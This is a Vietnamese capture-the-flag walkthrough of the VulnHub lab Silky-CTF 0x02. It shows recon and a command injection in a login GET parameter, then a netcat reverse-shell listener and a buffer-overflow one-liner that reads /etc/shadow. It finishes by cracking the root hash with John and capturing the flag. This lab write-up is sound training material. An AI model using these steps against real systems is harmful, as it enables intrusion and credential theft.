Mở đầu

 • Lại là mình đây, vẫn là cái serie vào /root để lấy cờ :joy_cat::joy_cat::joy_cat:. Vẫn là mấy bài lab trên VulnHub.com. Lần này sẽ là một bài khá đơn giản về lỗi Buffer OverFlow.
 • Silky-CTF: 0x02, Link bài lab, các bạn có thể tải về và build nó lên rồi làm thử nhé. Nếu mà chưa làm được hay bí bách chỗ nào thì kéo xuống dưới nè. Mình hint cho :D

Tấn công

 • Vẫn như thường lệ, build lab lên rồi phải dò IP của bài lab bằng nmap thôi. Quét ra địa chỉ 192.168.19.107 rồi. Vào trang thì thấy như này.

 • Sử dụng dirb quét thử xem trang có gì không.

 • Có trang /admin.php, vào thôi.

 • Thử login với Username = admin && Password = admin
 • URl:http://192.168.19.107/admin.php?username=admin&password=admin. Ồ, trang web sử dụng phương thức GET để lấy user và pass.
 • Sau khi thử một hồi các lỗi cơ bản thì phát hiện ra web này dính lỗi Commandline Injection, thử truyền ls vào ô username ta được hình bên dưới

 • Thực hiện Remote Shell qua thôi, đầu tiên ở máy mình gõ lệnh nc -lvp 5000 để lắng nghe tất cả cổng 5000 truyền đến.
 • Ở bên máy victim thì truyền vào như sau

 • Ok rồi, ta đã remote được, sau một hồi xem xét, bị vài cú lừa thì cũng lấy được 1 em flag ở/home/silky

 • Trong folder này thấy một file cat_shadow nữa, tải về máy mình xem. Run lên thì được như vầy.

  1
  2
  3
  
  root@kali:~# ./cat_shadow 
  cat_shadow: 
  Usage: cat_shadow <Password> 
  
 • Humm, thử truyền vài thứ vào xem.

  1
  2
  3
  4
  
  root@kali:~# ./cat_shadow AAAA
  Trying to cat /etc/shadow
   Permisson denied! 
   0x00000000 != 0x496c5962
  
 • Hình như cái lỗi Buffer OverFlow, truyền nhiều nhiều một chút xem nào

  1
  2
  3
  4
  
  root@kali:~# ./cat_shadow $(python -c "print('A'*30)")
  Trying to cat /etc/shadow
   Permisson denied! 
   0x00000000 != 0x496c5962
  
 • Chưa được, nhiều nữa xem thế nào.

  1
  2
  3
  4
  
  root@kali:~# ./cat_shadow $(python -c "print('A'*70)")
  Trying to cat /etc/shadow
   Permisson denied! 
   0x41414141 != 0x496c5962
  
 • Ăn rồi, sau một hồi thử thì nó bị dính ở 64, mình truyền cái chuỗi nó yêu cầu vào thôi

  1
  2
  3
  4
  5
  
  root@kali:~# ./cat_shadow $(python -c "print('A'*64+'\x62\x59\x6c\x49')")
  Trying to read /etc/shadow
  Succes
  Printing...
  root:$6$qvhlqI7I$//0whlOY9i55tzFatxkzafR7n7KA2P2nRh7kMSo82KrGV89ujtSTPEJOQjXsRGpSEFuFKnCT0a0.g92kCstOP1:17938:0:99999:7:::
  
 • Nhưng đây là đang ăn ở bên máy mình, phải run ở trên máy của victim chớ.

  1
  2
  3
  4
  5
  6
  7
  
  www-data@Silky-CTF0x02:/home/silky$ ./cat_shadow $(python -c "print('A'*64+'\x62\x59\x6c\x49')")
  <dow $(python -c "print('A'*64+'\x62\x59\x6c\x49')")
  Trying to read /etc/shadow
  Succes
  Printing...
  root:$6$L69RL59x$ONQl06MP37LfjyFBGlQ5TYtdDqEZEe0yIZIuTHASQG/dgH3Te0fJII/Wtdbu0PA3D/RTxJURc.Ses60j0GFyF/:18012:0:99999:7:::
  silky:$6$F0T5vQMg$BKnwGPZ17UHvqZLOVFVCUh6CrsZ5Eu8BLT1/uX3h44wtEoDt9qA2dYL04CMUXHw2Km9H.tttNiyaCHwQQ..2T0:18012:0:99999:7:::
  

  (Sorry nó dài quá mình cắt bớt lấy mấy thứ quan trọng thôi)

 • Silky thì mình có rồi, giờ lấy quyền root thôi. Sử dụng công cụ John có trong Kali để Brute Force mật khẩu.

   1
   2
   3
   4
   5
   6
   7
   8
   9
  10
  
  root@kali:~# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt
  Using default input encoding: UTF-8
  Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
  Cost 1 (iteration count) is 5000 for all loaded hashes
  Will run 4 OpenMP threads
  Press 'q' or Ctrl-C to abort, almost any other key for status
  greygrey     (root)
  1g 0:00:02:28 DONE (2019-06-18 09:22) 0.006716g/s 2070p/s 2070c/s 2070C/s guners..googleplex
  Use the "--show" option to display all of the cracked passwords reliably
  Session completed
  
 • Vậy ta lấy được mật khẩu root rồi, là greygrey, switch sang tài khoản root rồi chụp cờ cuối thôi.

   1
   2
   3
   4
   5
   6
   7
   8
   9
  10
  11
  12
  13
  14
  15
  16
  17
  18
  19
  
  root@Silky-CTF0x02:/# cd /root
  cd /root
  root@Silky-CTF0x02:~# ls
  ls
  flag.txt
  root@Silky-CTF0x02:~# cat flag.txt
  cat flag.txt
  ███████╗██╗██╗   ██╗ ██╗██╗  ██╗   ██████╗████████╗███████╗  ██████╗ ██╗ ██╗ ██████╗ ██████╗ 
  ██╔════╝██║██║   ██║ ██╔╝╚██╗ ██╔╝   ██╔════╝╚══██╔══╝██╔════╝  ██╔═████╗╚██╗██╔╝██╔═████╗╚════██╗
  ███████╗██║██║   █████╔╝ ╚████╔╝█████╗██║    ██║  █████╗   ██║██╔██║ ╚███╔╝ ██║██╔██║ █████╔╝
  ╚════██║██║██║   ██╔═██╗  ╚██╔╝ ╚════╝██║    ██║  ██╔══╝   ████╔╝██║ ██╔██╗ ████╔╝██║██╔═══╝ 
  ███████║██║███████╗██║ ██╗  ██║    ╚██████╗  ██║  ██║███████╗╚██████╔╝██╔╝ ██╗╚██████╔╝███████╗
  ╚══════╝╚═╝╚══════╝╚═╝ ╚═╝  ╚═╝     ╚═════╝  ╚═╝  ╚═╝╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝
  
  Fun Fact:
  Um ein Kilogramm Rohseide zu gewinnen, werden bis zu zehn Kilogramm Kokons benötigt.
  
  Glückwunsch :)
  Flag:d1f258a6ec26dffbbdec79f68890a5e8
  

Tổng kết

 • Một bài CTF đơn giản về web và buffer overflow cho các bạn thử. Goodluck :D